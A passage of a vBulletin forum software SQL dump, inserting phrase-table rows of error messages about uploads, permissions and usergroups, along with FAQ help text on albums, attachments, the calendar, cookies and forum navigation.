(34933, -1, 'upload_exceeds_dimensions', 'error', 'The Dimension limits for this filetype are {1} x {2}. We were unable to resize your file so you will need to do so manually and upload it again. Your file is currently {3} x {4}.', 'vbulletin', '', 0, ''),
(34934, -1, 'upload_file_created_with_different_version', 'error', 'This file was created using a different version of vBulletin from the one you are running. Your version: {1} File version: {2}', 'vbulletin', '', 0, ''),
(34935, -1, 'upload_file_exceeds_forum_limit', 'error', 'Your file of {1} bytes exceeds the forum\'s limit of {2} for this filetype.', 'vbulletin', '', 0, ''),
(34936, -1, 'upload_file_exceeds_php_limit', 'error', 'File exceeds PHP\'s filesize limit of {1}.', 'vbulletin', '', 0, ''),
(34937, -1, 'upload_file_failed', 'error', 'Upload of file failed.', 'vbulletin', '', 0, ''),
(34938, -1, 'upload_file_partially_uploaded', 'error', 'File was only partially uploaded due to server problem.', 'vbulletin', '', 0, ''),
(34939, -1, 'upload_file_system_is_not_writable', 'error', 'File system directory is not writable.', 'vbulletin', '', 0, ''),
(34940, -1, 'upload_fopen_disabled', 'error', 'Remote file uploads have been disabled.', 'vbulletin', '', 0, ''),
(34941, -1, 'upload_imageinfo_failed_x', 'error', 'Imageinfo Failed: {1} ', 'vbulletin', '', 0, ''),
(34942, -1, 'upload_invalid_animatedgif', 'error', 'You may not upload animated images.', 'vbulletin', '', 0, ''),
(34943, -1, 'upload_invalid_file', 'error', 'Invalid File', 'vbulletin', '', 0, ''),
(34944, -1, 'upload_invalid_image', 'error', 'This is not a valid image file.', 'vbulletin', '', 0, ''),
(34945, -1, 'upload_invalid_image_extension', 'error', 'This {1} image has the incorrect file extension.', 'vbulletin', '', 0, ''),
(34946, -1, 'upload_invalid_imagepath', 'error', 'Unable to save image', 'vbulletin', 'vBulletin Solutions', 1150192126, '3.6.0 Beta 2'),
(34947, -1, 'upload_invalid_url', 'error', 'Invalid URL', 'vbulletin', '', 0, ''),
(34948, -1, 'upload_remoteimage_toolarge', 'error', 'Remote file is too large', 'vbulletin', '', 0, ''),
(34949, -1, 'upload_stopped_by_extension', 'error', 'Upload stopped by a PHP extension', 'vbulletin', 'vBulletin Solutions', 1190139657, '3.7.0 Beta 1'),
(34950, -1, 'upload_total_album_pics_countfull', 'error', 'This picture exceeds your total album picture quota by {1}.', 'vbulletin', 'vBulletin Solutions', 1192541938, '3.7.0 Beta 1'),
(34951, -1, 'upload_unable_move', 'error', 'Unable to move/copy file', 'vbulletin', '', 0, ''),
(34952, -1, 'upload_writefailed', 'error', 'Failed to write file. Check disc quotas and permissions for the path: {2} ({1})', 'vbulletin', 'vBulletin Solutions', 1181925815, '3.6.8'),
(34953, -1, 'upload_writefile_failed', 'error', 'Upload failed due to failure writing temporary file.', 'vbulletin', '', 0, ''),
(34954, -1, 'user_accounts_merged', 'error', 'User accounts merged. {1} has been deleted. \r\nYou need to Update User Titles and Ranks and Rebuild Thread Information counters now if you wish to remove traces of {1} from last post information and to update {2}\'s new user title.', 'vbulletin', '', 0, ''),
(34955, -1, 'user_accounts_validated', 'error', 'User accounts validated and users notified.', 'vbulletin', '', 0, ''),
(34956, -1, 'user_chosen_privacy_prevents_viewing', 'error', 'Sorry, this user has chosen a privacy option that prevents you from viewing this information.', 'vbulletin', 'vBulletin Solutions', 1232635582, '3.8.1'),
(34957, -1, 'user_is_protected_from_alteration_by_undeletableusers_var', 'error', 'Sorry, this user is protected from being altered in the config.php file by the $config[\'SpecialUsers\'][\'undeletableusers\'] variable.', 'vbulletin', '', 0, ''),
(34958, -1, 'user_no_longer_moderator', 'error', 'It appears that this user is no longer a moderator. The most likely cause for this message is that you accidentally clicked the remove button twice.', 'vbulletin', '', 0, ''),
(34959, -1, 'user_records_repaired', 'error', 'All users have been checked and any lost records found have been restored', 'vbulletin', '', 0, ''),
(34960, -1, 'user_x_has_been_banned_permanently', 'error', 'User {1} has been banned permanently', 'vbulletin', '', 0, ''),
(34961, -1, 'user_x_has_been_banned_until_y', 'error', 'User {1} has been banned until {2}', 'vbulletin', '', 0, ''),
(34962, -1, 'useralreadyvote', 'error', 'You have already voted on this poll. Please press back to see the results.', 'vbulletin', '', 0, ''),
(34963, -1, 'usergroup_already_member', 'error', 'You are already a member of this group!', 'vbulletin', '', 0, ''),
(34964, -1, 'usergroup_cantleave_groupleader', 'error', 'You cannot leave a usergroup of which you are a leader.', 'vbulletin', '', 0, ''),
(34965, -1, 'usergroup_cantleave_notmember', 'error', 'You cannot leave a usergroup to which you do not belong!', 'vbulletin', '', 0, ''),
(34966, -1, 'usergroup_cantleave_primary', 'error', 'You cannot leave your primary usergroup', 'vbulletin', '', 0, ''),
(34967, -1, 'usergroup_equals_secondary', 'error', 'This user\'s primary usergroup is also listed as a secondary group for this user. Please change the primary group or remove the secondary group.', 'vbulletin', '', 0, ''),
(34968, -1, 'usergroup_invaliddisplaygroup', 'error', 'The usergroup you specified cannot be used as a primary display group', 'vbulletin', '', 0, ''),
(34969, -1, 'usergroup_not_public_or_invalid', 'error', 'The usergroup you selected is either not a public group, or does not exist', 'vbulletin', '', 0, ''),
(34970, -1, 'usergroup_notpublic', 'error', 'This does not appear to be a public user group.', 'vbulletin', '', 0, ''),
(34971, -1, 'usergroupleader_deleted', 'error', 'You did not specify any users to delete.', 'vbulletin', '', 0, ''),
(34972, -1, 'username_contains_semi_colons', 'error', 'Sorry, the username entered contains one or more semi-colon characters ( ; ). Please go back and remove any semi-colons', 'vbulletin', '', 0, ''),
(34973, -1, 'username_same_as_password', 'error', 'Your password is the same as your username. This is no longer allowed. \r\n \r\nPlease change your password using this page .', 'vbulletin', 'vBulletin Solutions', 1219143165, '3.8.0 Alpha 1'),
(34974, -1, 'usernametaken', 'error', 'That username is already in use or does not meet the administrator\'s standards. If you are {1} and you have forgotten your password, click here .', 'vbulletin', 'vBulletin Solutions', 1171279360, '3.6.5'),
(34975, -1, 'usernametaken_edit_here', 'error', 'The username {1} is already in use. You can edit that user here ', 'vbulletin', '', 0, ''),
(34976, -1, 'usernametoolong', 'error', 'Your username cannot be longer than {1} characters.', 'vbulletin', '', 0, ''),
(34977, -1, 'usernametooshort', 'error', 'Your username cannot be shorter than {1} characters.', 'vbulletin', '', 0, ''),
(34978, -1, 'usernoemail', 'error', 'Sorry! That user has specified that they do not wish to receive emails. If you still wish to send an email to this user, please contact the administrator and they may be able to help.', 'vbulletin', '', 0, ''),
(34979, -1, 'usernotenotallowed', 'error', 'Leaving user notes for members of this usergroup is not allowed.', 'vbulletin', 'vBulletin Solutions', 1213610598, '3.8.0 Alpha 1'),
(34980, -1, 'variable_name_exists', 'error', 'You have attempted to change the variable name from \'{1} \' to \'{2} \', but a phrase already exists with the variable name \'{2} \'. - The update cannot continue', 'vbulletin', '', 0, ''),
(34981, -1, 'variables_missing_suhosin', 'error', 'Required variables have gone missing and execution can not continue. Please try again. \r\n \r\nThis error can sometimes occur as a result of Suhosin / Hardened PHP being installed on your server. If you know that you have Suhosin running and you have access to the PHP configuration, try increasing the value of the following variables:\r\n\r\nphp_value suhosin.post.max_vars \r\nphp_value suhosin.request.max_vars \r\n ', 'vbulletin', 'vBulletin Solutions', 1200570235, '3.7.0 Beta 4'),
(34982, -1, 'verify_hash_failed_contact_admin_revert_template', 'error', 'Verification hash check failed. Please contact the administrator and ask that he or she revert the following template: {2}.', 'vbulletin', 'vBulletin Solutions', 1207828516, '3.7.0 Release Candidate 3'),
(34983, -1, 'version_check_connect_failed_host_x_error_y', 'error', 'Version check connection to host {1} failed. Please try again later. \r\n \r\nThe error returned was: \'{2}\'', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34984, -1, 'version_check_failed_not_found', 'error', 'Version check failed. No version number was found at this location. The URL for the version check may be incorrect, or the server may be experiencing problems. Please try again later.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34985, -1, 'whosonlinedisabled', 'error', 'The administrator has disabled Who\'s Online.', 'vbulletin', '', 0, ''),
(34986, -1, 'xml_error_x_at_line_y', 'error', 'XML Error: {1} at Line {2}', 'vbulletin', '', 0, ''),
(34987, -1, 'you_are_limited_to_working_with_x_discussions', 'error', 'You are limited to working with {1} discussions', 'vbulletin', 'vBulletin Solutions', 1214238020, '3.7.1'),
(34988, -1, 'you_are_limited_to_working_with_x_messages', 'error', 'You are limited to working with {1} messages', 'vbulletin', 'vBulletin Solutions', 1191952106, '3.7.0 Beta 1'),
(34989, -1, 'you_are_limited_to_working_with_x_pictures', 'error', 'You are limited to working with {1} pictures.', 'vbulletin', 'vBulletin Solutions', 1203721472, '3.7.0 Beta 6'),
(34990, -1, 'you_are_limited_to_working_with_x_posts', 'error', 'You are limited to working with {1} post(s)', 'vbulletin', 'vBulletin Solutions', 1150509223, '3.6.0 Beta 3'),
(34991, -1, 'you_are_limited_to_working_with_x_threads', 'error', 'You are limited to working with {1} threads', 'vbulletin', '', 0, ''),
(34992, -1, 'you_are_not_allowed_to_warn_moderators', 'error', 'You are not allowed to give warnings or infractions to Moderators.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34993, -1, 'you_can_not_remove_vbulletin_copyright', 'error', 'Sorry, you cannot remove the vBulletin copyright text using this page. You must use the main template editor to do this, if your license allows you to remove the vBulletin copyright text .', 'vbulletin', '', 0, ''),
(34994, -1, 'you_can_only_create_x_groups', 'error', 'You can only create {1} group(s). ', 'vbulletin', 'vBulletin Solutions', 1218711488, '3.8.0 Alpha 1'),
(34995, -1, 'you_can_only_create_x_groups_delete', 'error', 'You can only create {1} group(s). You may delete a group in order to create a new one.', 'vbulletin', 'vBulletin Solutions', 1218711450, '3.8.0 Alpha 1'),
(34996, -1, 'you_did_not_enter_a_valid_value', 'error', 'You did not enter a valid value for this setting.', 'vbulletin', 'vBulletin Solutions', 1149694439, '3.6.0 Beta 1'),
(34997, -1, 'you_did_not_select_any_prefixes', 'error', 'You did not select any prefixes.', 'vbulletin', 'vBulletin Solutions', 1216748060, '3.8.0 Alpha 1'),
(34998, -1, 'you_did_not_select_any_valid_discussions', 'error', 'You did not select any valid discussions', 'vbulletin', 'vBulletin Solutions', 1214237966, '3.7.1'),
(34999, -1, 'you_did_not_select_any_valid_messages', 'error', 'You did not select any valid messages', 'vbulletin', 'vBulletin Solutions', 1191952048, '3.7.0 Beta 1'),
(35000, -1, 'you_did_not_select_any_valid_pictures', 'error', 'You did not select any valid pictures.', 'vbulletin', 'vBulletin Solutions', 1203721456, '3.7.0 Beta 6'),
(35001, -1, 'you_did_not_select_any_valid_threads', 'error', 'You did not select any valid threads', 'vbulletin', '', 0, ''),
(35002, -1, 'you_do_not_have_permission_forum', 'error', 'You do not have permission to manage announcements in this forum.', 'vbulletin', '', 0, ''),
(35003, -1, 'you_do_not_have_permission_global', 'error', 'You do not have permission to manage Global announcements.', 'vbulletin', '', 0, ''),
(35004, -1, 'you_do_not_have_permission_to_delete_discussions', 'error', 'You do not have permission to delete discussions.', 'vbulletin', 'vBulletin Solutions', 1212493565, '3.7.1'),
(35005, -1, 'you_do_not_have_permission_to_delete_messages', 'error', 'You do not have permission to delete messages', 'vbulletin', 'vBulletin Solutions', 1191952350, '3.7.0 Beta 1'),
(35006, -1, 'you_do_not_have_permission_to_delete_pictures', 'error', 'You do not have permission to delete pictures.', 'vbulletin', 'vBulletin Solutions', 1203723889, '3.7.0 Beta 6'),
(35007, -1, 'you_do_not_have_permission_to_delete_selected_discussions', 'error', 'You do not have permission to delete all of the selected discussions.', 'vbulletin', 'vBulletin Solutions', 1212493844, '3.7.1'),
(35008, -1, 'you_do_not_have_permission_to_delete_selected_messages', 'error', 'You do not have permission to delete all of the selected social group messages.', 'vbulletin', 'vBulletin Solutions', 1212493930, '3.7.1'),
(35009, -1, 'you_do_not_have_permission_to_delete_threads_and_posts', 'error', 'You do not have permission to delete threads and posts \r\nPost: {1} \r\nThread: {2} \r\nForum: {3}', 'vbulletin', '', 0, ''),
(35010, -1, 'you_do_not_have_permission_to_hard_delete_discussions', 'error', 'You do not have permission to physically delete discussions.', 'vbulletin', 'vBulletin Solutions', 1212493535, '3.7.1'),
(35011, -1, 'you_do_not_have_permission_to_hard_delete_messages', 'error', 'You do not have permission to physically delete social group messages.', 'vbulletin', 'vBulletin Solutions', 1212493626, '3.7.1'),
(35012, -1, 'you_do_not_have_permission_to_manage_deleted_discussions', 'error', 'You do not have permissions to manage deleted discussions', 'vbulletin', 'vBulletin Solutions', 1212162270, '3.7.1'),
(35013, -1, 'you_do_not_have_permission_to_manage_deleted_messages', 'error', 'You do not have permission to manage deleted messages', 'vbulletin', 'vBulletin Solutions', 1191952189, '3.7.0 Beta 1'),
(35014, -1, 'you_do_not_have_permission_to_manage_deleted_threads_and_posts', 'error', 'You do not have permission to manage deleted threads and posts \r\nPost: {1} \r\nThread: {2} \r\nForum: {3}', 'vbulletin', '', 0, ''),
(35015, -1, 'you_do_not_have_permission_to_manage_deleted_threads_and_posts_in_destination_forum', 'error', 'You do not have permission to manage deleted threads and posts in the destination forum', 'vbulletin', '', 0, ''),
(35016, -1, 'you_do_not_have_permission_to_manage_moderated_attachments', 'error', 'You do not have permission to manage moderated attachments Post: {1} Thread: {2} Forum: {3}', 'vbulletin', '', 0, ''),
(35017, -1, 'you_do_not_have_permission_to_manage_moderated_discussions', 'error', 'You do not have permission to manage moderated discussions.', 'vbulletin', 'vBulletin Solutions', 1212058495, '3.7.1'),
(35018, -1, 'you_do_not_have_permission_to_manage_moderated_messages', 'error', 'You do not have permission to manage moderated messages.', 'vbulletin', 'vBulletin Solutions', 1212058467, '3.7.1'),
(35019, -1, 'you_do_not_have_permission_to_manage_moderated_threads_and_posts', 'error', 'You do not have permission to manage moderated threads and posts', 'vbulletin', '', 0, ''),
(35020, -1, 'you_do_not_have_permission_to_manage_moderated_threads_and_posts_in_destination_forum', 'error', 'You do not have permission to manage moderated threads and posts in the destination forum', 'vbulletin', '', 0, ''),
(35021, -1, 'you_do_not_have_permission_to_manage_thread_redirects', 'error', 'You do not have permission to manage thread redirects \r\nThread: {1} \r\nForum: {2}', 'vbulletin', '', 0, ''),
(35022, -1, 'you_do_not_have_permission_to_manage_threads_and_posts', 'error', 'You do not have permission to manage threads and posts \r\nPost: {1} \r\nThread: {2} \r\nForum: {3}', 'vbulletin', '', 0, ''),
(35023, -1, 'you_do_not_have_permission_to_moderate_discussions', 'error', 'You do not have permission to moderate discussions', 'vbulletin', 'vBulletin Solutions', 1212162465, '3.7.1'),
(35024, -1, 'you_do_not_have_permission_to_moderate_messages', 'error', 'You do not have permission to moderate messages', 'vbulletin', 'vBulletin Solutions', 1191952217, '3.7.0 Beta 1'),
(35025, -1, 'you_do_not_have_permission_to_moderate_pictures', 'error', 'You do not have permission to moderate pictures.', 'vbulletin', 'vBulletin Solutions', 1203721822, '3.7.0 Beta 6'),
(35026, -1, 'you_do_not_have_permission_to_openclose_threads', 'error', 'You do not have permission to open/close threads \r\nThread: {1} \r\nForum: {2}', 'vbulletin', '', 0, ''),
(35027, -1, 'you_do_not_have_permission_to_soft_delete_discussions', 'error', 'You do not have permission to soft delete discussions.', 'vbulletin', 'vBulletin Solutions', 1212493430, '3.7.1'),
(35028, -1, 'you_do_not_have_permission_to_soft_delete_messages', 'error', 'You do not have permission to soft delete social group messages.', 'vbulletin', 'vBulletin Solutions', 1212493672, '3.7.1'),
(35029, -1, 'you_do_not_have_permission_to_stickunstick_threads', 'error', 'You do not have permission to stick/unstick threads \r\nThread: {1} \r\nForum: {2}', 'vbulletin', '', 0, ''),
(35030, -1, 'you_do_not_share_delete_permission', 'error', 'You do not share the same delete permission for all of the posts or threads that have been selected.', 'vbulletin', '', 0, ''),
(35031, -1, 'you_have_no_attachments_set_to_thumb', 'error', 'You have not set any attachments to be thumbnailed at Attachments -> Attachment Manager', 'vbulletin', 'vBulletin Solutions', 1182779156, '3.6.8'),
(35032, -1, 'you_must_enter_the_password_token_into_the_message', 'error', 'You must enter the password token {password} into the email message.', 'vbulletin', 'vBulletin Solutions', 1219318660, '3.8.0 Alpha 1'),
(35033, -1, 'you_must_pick_a_usergroup_or_forum_to_check_permissions', 'error', 'You must pick a usergroup or forum for which to check permissions', 'vbulletin', '', 0, ''),
(35034, -1, 'your_search_included_threads', 'error', 'Your search included threads from which you only have permission to view their titles. You may find further results if you choose the \"Search Thread Titles Only\" option.', 'vbulletin', 'vBulletin Solutions', 1170377981, '3.6.5'),
(35035, -1, 'your_server_has_safe_mode_enabled', 'error', 'Your server has PHP\'s SAFE_MODE enabled. You cannot move attachments to files while SAFE_MODE is enabled. Please contact your host and ask them to consider disabling it if you wish to use the file system for attachments.', 'vbulletin', '', 0, ''),
(35036, -1, 'your_vb_settings_have_been_updated_to_store_attachments_in_x', 'error', 'Your vBulletin settings have now been updated to store attachments in {1} rather than {2} . You must now manually move all attachments to the new folder, using an FTP client or a shell command such as: mv -rf {2}/* {1}/
', 'vbulletin', '', 0, ''),
(35037, -1, 'your_vb_settings_have_been_updated_to_store_group_icons_in_x', 'error', 'Your vBulletin settings have now been updated to store social group icons in {1} rather than {2} . You must now manually move all group icon images to the new folder, using an FTP client or a shell command such as: mv -rf {2}/* {1}/
', 'vbulletin', 'vBulletin Solutions', 1216905404, '3.8.0 Alpha 1'),
(35038, -1, 'your_vb_settings_have_been_updated_to_store_images_in_x', 'error', 'Your vBulletin settings have now been updated to store images in {1} rather than {2} . You must now manually move all avatars to the new folder, using an FTP client or a shell command such as: mv -rf {2}/* {1}/
', 'vbulletin', '', 0, ''),
(35039, -1, 'your_version_no_image_support', 'error', 'Your version of PHP does not have image support. Please make sure you have enabled GD if your server does support it by going to Options -> vBulletin Options -> Image Settings', 'vbulletin', '', 0, ''),
(35040, -1, 'yourpmquotaexceeded', 'error', 'You have reached your stored private message quota and cannot send any further messages until space has been created.', 'vbulletin', '', 0, ''),
(35041, -1, 'vb3_albums', 'faqtext', 'How do I use albums?
\r\n\r\nAs a member, you can create Albums of images that are linked to your public profile. Albums can be created by visiting the User Control Panel , and clicking on the \'Pictures & Albums\' link, and then clicking on \'Add Album\'.
\r\n\r\nEach album can have a title (\'Joe\'s Holiday to Nepal\'), a description (\'A bunch of photos from my recent adventure\') and can be of three different types: Public, Private or Profile.
\r\n\r\n\r\nPublic albums can be viewed by anyone \r\nPrivate albums can only be viewed by site staff (moderators, administrators) and your Friends and Contacts (info ) \r\nProfile albums are viewable only by you. However, you can use the images to customize your public profile (info ) \r\n \r\n\r\nHow do I upload pictures?
\r\n\r\nOnce you\'ve created an album you can upload images to it. Simply view the album and click on \'Upload Pictures\'.
\r\n\r\nYou\'ll have the option to give each picture a caption, and to set one image as the Album cover, which will be displayed on the public profile. To delete an album or edit the title, description or album type, click on \'Edit Album\'. To delete an image, or to edit a caption or change the album cover, click on \'Edit Pictures\'.
\r\n\r\nAll members who have access to your album images can comment on them, in a similar way to Visitor Messages (more info ). You can delete any image comments from your albums, and report inappropriate messages to moderators.
\r\n\r\nWhen you have uploaded a picture, you can place it in your posts by using the BB code text that is displayed below the image when you view it at full size.
', 'vbulletin', 'vBulletin Solutions', 1232372602, '3.8.1'),
(35042, -1, 'vb3_announcements', 'faqtext', 'What are announcements?
\r\n\r\nAnnouncements are special messages posted by the administrator or moderators. They are a simple one-way communication with the users and you can\'t reply. If you wish to discuss announcements, you will have to create a new thread in the forum.
\r\n\r\nAnnouncement threads are displayed at the top of forum listing pages, above regular and sticky threads.
', 'vbulletin', 'vBulletin Solutions', 1204551344, '3.7.0 Beta 6'),
(35043, -1, 'vb3_attachments', 'faqtext', 'How do I attach a file to a post?
\r\n\r\nTo attach a file to your post, you need to be using the main \'New Post\' or \'New Thread\' page and not \'Quick Reply\'. To use the main \'New Post\' page, click the \'Post Reply\' button in the relevant thread.
\r\n\r\nOn this page, below the message box, you will find a button labelled \'Manage Attachments\'. Clicking this button will open a new window for uploading attachments. You can upload an attachment either from your computer or from another URL by using the appropriate box on this page. Alternatively you can click the Attachment Icon to open this page.
\r\n\r\nTo upload a file from your computer, click the \'Browse\' button and locate the file. To upload a file from another URL, enter the full URL for the file in the second box on this page. Once you have completed one of the boxes, click \'Upload\'.
\r\n\r\nOnce the upload is completed the file name will appear below the input boxes in this window. You can then close the window to return to the new post screen.
\r\n\r\nWhat files types can I use? How large can attachments be?
\r\n\r\nIn the attachment window you will find a list of the allowed file types and their maximum sizes. Files that are larger than these sizes will be rejected. There may also be an overall quota limit to the number of attachments you can post to the board.
\r\n\r\nHow do I add an image to a post?
\r\n\r\nIf you have uploaded an image as an attachment, you can click the arrow next to the \'Attachment Icon\' and select it from the list. This will be inserted into your post and can be located where you want it displayed.
\r\n\r\nTo include an image that is not uploaded as an attachment and is located on another website, you can do so by copying the full URL to the image, (not the page on which the image is located), and either pressing the \'Insert Image\' icon or by typing [img] before the URL and [/img] after it, ensuring that you do not have any spaces before or after the URL of the image. You can insert pictures from your albums (?) in this way too.
', 'vbulletin', 'vBulletin Solutions', 1207905878, '3.7.0 Release Candidate 4'),
(35044, -1, 'vb3_board_faq', 'faqtext', 'Here you can find answers to questions about how the board works. Use the links below or the search box above to find your way around.', 'vbulletin', 'vBulletin Solutions', 1204806694, '3.7.0 Beta 6'),
(35045, -1, 'vb3_board_usage', 'faqtext', '', 'vbulletin', 'vBulletin Solutions', 1228216516, '3.8.0 Release Candidate 1'),
(35046, -1, 'vb3_calendar', 'faqtext', 'You will see a \'Calendar \' link near the top of the forums (if this option is enabled by the administrator). By default, the forums will have one Calendar that can be viewed and used by all members.
\r\n\r\nMembers can add upcoming events that might interest the community. You can also sign up to get email alerts about upcoming events.
\r\n\r\nIn addition, the administrator could create additional private calendars for individual members or for specific user groups.
\r\n\r\nHow do I add an event to the Calendar?
\r\n\r\nIf you have the appropriate permissions, there will be a box on the Calendar labelled \'Add New Event\'. The administrator may have enabled registered members to post public events, but usually this is not the case. It\'s more likely that you can only post your own private events that can only be seen by you.
\r\n\r\nThere are three types of event that can be added to a calendar:
\r\n\r\n\r\nSingle, All Day Event - an event that takes place for the whole of a day. \r\nRanged Event - events that have a defined start time and end time, not necessarily both on the same day. \r\nRecurring Event - repeat over a set period of time based on certain criteria. Examples would be an event that occurs on the first Monday of every month and an event that occurs every Monday and Wednesday. \r\n \r\n\r\nJust choose the appropriate option for the event you are adding, fill in the required information, then save the event. It will now appear on the Calendar.
\r\n\r\nWhere do birthdays show?
\r\n\r\nBirthdays may be shown on the calendar if the administrator has enabled this feature. Your birthday will automatically be shown on the calendar if you have entered the date of your birthday in your profile. Note: if you do not enter the year of your birth when you edit your profile, your age will not be shown on the calendar.
\r\n\r\nIf you enter your birthday, your name will also appear on the main forum page when it is your birthday.
', 'vbulletin', 'vBulletin Solutions', 1207146046, '3.7.0 Release Candidate 3'),
(35047, -1, 'vb3_changing_details', 'faqtext', 'How do I change my user details?
\r\n\r\nYou can change your account information using the User Control Panel . For basic profile details (including your email address and password), click on the \'Edit Your Details \' option from within the User CP. This page allows you to set a number of required and optional details, some of which will be displayed on your public profile. With the exception of your email address, do not enter information that you do not wish to be publicly viewable.
', 'vbulletin', 'vBulletin Solutions', 1207146223, '3.7.0 Release Candidate 3'),
(35048, -1, 'vb3_contact_members', 'faqtext', 'Can I email other members?
\r\n\r\nYes. To send an email to another member, you can either find them on the member list , or click the email user button on any post they have written.
\r\n\r\nThis will usually open a page that contains a form where you can enter your message. When you have finished typing your message, press the \'send email\' button and your message will be sent instantly.
\r\n\r\nCan I see email addresses?
\r\n\r\nFor privacy reasons, the recipient\'s email address is not revealed to you during this process.
\r\n\r\nWhy can\'t I send an email to someone?
\r\n\r\nIf you cannot find an email button or link for a member, it means either that the administrator has disabled email functions for this forum, or that the member has said that they do not wish to receive email from other members.
\r\n\r\nCan I email a link to a friend?
\r\n\r\nAnother useful email function is the ability to send a friend a link to a thread you think they may find interesting. Whenever you view a thread, you will find a link somewhere on the page which will allow you to send a brief message to anyone you like. Your referrer ID is added to the link you send, so if your friend registers on this forum as a result of viewing the link you sent to them, your referrals total will automatically be credited.
\r\n\r\nWhat is private messaging?
\r\n\r\nRegistered members may also be able to send messages to other members of this forum using the private messaging system. For more information about private messaging, click here .
\r\n\r\nWhat are visitor messages?
\r\n\r\nRegistered members may leave messages for other members on their profile page. These messages can generally be viewed by all visitors, including members, guests and search engine spiders. For more information on visitor messages, click here .
', 'vbulletin', 'vBulletin Solutions', 1207905713, '3.7.0 Release Candidate 4'),
(35049, -1, 'vb3_cookies', 'faqtext', 'What is \'Automatic Login\'?
\r\n\r\nWhen you register (and also when you login using the form at the top of the screen), you will be given the option to \'Remember Me\'. This will store your identity securely in a cookie on your computer. If you are using a shared computer, such as in a library, school or internet cafe, or if you have reason to not trust any other users that might use this computer, we recommend you do not enable this.
\r\n\r\nHow do I clear cookies?
\r\n\r\nYou can clear all your cookies set by the forum by clicking the \'logout\' link at the top of the page. In some cases, if you return to the main index page via the link provided and you are still logged in, you may have to remove your cookies manually.
\r\n\r\nIn Internet Explorer 6 on Windows XP: Click the \'Tools\' menu. Select \'Internet Options\' from the menu that appears. Click \'Delete Cookies\' on the dialog box that appears. It will be in the center area of the \'General\' tab.
\r\n\r\nIn Internet Explorer 7 : Click the \'Tools\' menu. Select \'Internet Options\' from the menu that appears. Click \'Delete...\', beneath \'Browsing History\' on the dialog box that appears. It will be in the center area of the \'General\' tab. Click \'Delete cookies...\' on the next dialog box that appears.
\r\n\r\nIn Firefox : Click the \'Tools\' menu. Select \'Options\' from the menu that appears. From the dialog box, select \'Privacy\' on the left. Find \'Cookies\' on the main pane, and click the \'Clear\' button adjacent to it.
\r\n\r\nIn Safari : Go to Preferences, Security, then show Cookies and either select \'Remove all\' or select individual cookies and then the \'Delete\' button.
\r\n\r\nIn Opera : Go to Tools, Preferences, Advanced, Cookies, Manage cookies then select the name of this site and click the \'Delete\' button.
\r\n\r\nYour cookies should now be removed. You may want to restart the computer and revisit the forums to be sure.
\r\n\r\nOther browsers may have a different method of clearing cookies. Refer to the documentation for your own browser if you are unsure.
', 'vbulletin', 'vBulletin Solutions', 1208620809, '3.7.0 Release Candidate 4'),
(35050, -1, 'vb3_editing_deleting', 'faqtext', 'Can I edit or delete my posts?
\r\n\r\nIf you have registered and are logged in, you may be able to edit and delete your posts (although the administrator may have turned off this option). Your ability to edit your posts may be time-limited, depending on how the administrator has set up the forum.
\r\n\r\nTo edit or delete your posts, click the Edit button by the particular post. If your post was the first in the thread, then deleting it may remove the entire thread.
\r\n\r\nOnce you\'ve made your modifications, a note may appear to inform other users that you have edited your post.
\r\n\r\nIf the edit time and date appear as a link you can click on this to see the differences between the original and edited versions, or between edits if there have been multiple edits.
\r\n\r\nCan others edit my posts?
\r\n\r\nAdministrators and moderators may also edit your messages. If they do, there may not be a note telling other users that the post was modified.
', 'vbulletin', 'vBulletin Solutions', 1204559380, '3.7.0 Beta 6'),
(35051, -1, 'vb3_forums_threads_posts', 'faqtext', 'What is a bulletin board?
\r\n\r\nA bulletin board is an online discussion site. It\'s sometimes also called a \'board\' or \'forums\'. It may contain several categories, consisting of forums, threads and individual posts.
\r\n\r\nHow is all this structured?
\r\n\r\nThe bulletin board as a whole contains various categories (broad subject areas), which themselves contain forums (more specific subject areas) which contain threads (conversations on a topic) which are made up of individual posts (where a user writes something).
\r\n\r\nThe board home page has a list of categories and forums, with basic statistics for each - including the number of threads and posts, and which member posted the most recent message.
\r\n\r\nHow do I find my way around?
\r\n\r\nWhen you click on a forum\'s name, you are taken to the list of threads it contains. A thread is a conversation between members or guests. Each thread starts out as a single post and grows as more individual posts are added by different users. Threads can be rated (?) to show how useful or popular they are and may contain polls (?) .
\r\n\r\nTo start a new thread simply click on the \'new thread\' button (you may need the right permissions to do this).
\r\n\r\nThreads can be ordered in many different ways. The default is to have the thread with the most recent activity at the top. But you can easily change this ordering, for example to have the thread with the most posts at the top, or the highest rating. Simply click on the appropriate column heading at the top of the list of threads (Thread, Thread Starter, Rating, Last Post, Replies or Views). You can also reverse the sorting order by clicking the arrow next to the name of the active option. (Note that \'sticky\' threads will always be at the top no matter how you change the viewing options).
\r\n\r\nMulti-page views
\r\n\r\nWhen there are more threads to display than will fit on a single page, you may see the \'Page\' box, which contains page numbers. This indicates that the list of threads has been split over two or more pages.
\r\n\r\nThis method of splitting lists of items over many pages is used throughout the board.
\r\n\r\nWhat are sticky threads?
\r\n\r\n\'Sticky\' threads are created by moderators or administrators (?) , and remain \'stuck\' to the top of the listing, even if they haven\'t had any posts recently. Their purpose is to keep important information visible and accessible at all times.
\r\n\r\nHow do I read a thread?
\r\n\r\nTo read a thread, click on its title. Each post in a thread is created by a member or a guest. You\'ll see some brief information about the member who created the thread above the main post message. In some cases it will be to the side of the post.
\r\n\r\nTo post a reply to an existing thread, click on the \'Post Reply\' button. If the \'Post Reply\' button does not appear, it could mean that you are not logged in as a member, or that you do not have permission to reply, or that the thread has been closed to new replies.
\r\n\r\nIf enabled, there will also be a \'Quick Reply\' box where you can quickly enter a reply without having to go to the \'Post Reply\' page. You may need to click the quick reply button in a post to activate the quick reply box before you can type into it.
\r\n\r\nOn long threads you may want to change how the posts are ordered. For more on different ways to view and navigate threads, click (?) .
\r\n\r\nIs there a faster way to get to forums?
\r\n\r\nIf you know which forum you want to go to, you can use the \'Forum Jump\' control, which appears at the bottom of many pages within the board.
\r\n\r\nHow do I find out more about members?
\r\n\r\nTo view information about a particular member, click on the user name. This will take you to their public profile page (?) .
\r\n\r\nWhat is the Navigation Bar?
\r\n\r\nThe navigation bar at the top of every page has links to help you move around. A \'breadcrumb\' area at the top left shows where you are now. A form on the right allows you to quickly login. With one click you can reach areas such as: the User Control Panel (?) , FAQ (which you are reading now), the Calendar (?) , Search options (?) and Quick Links (?) to other useful features.
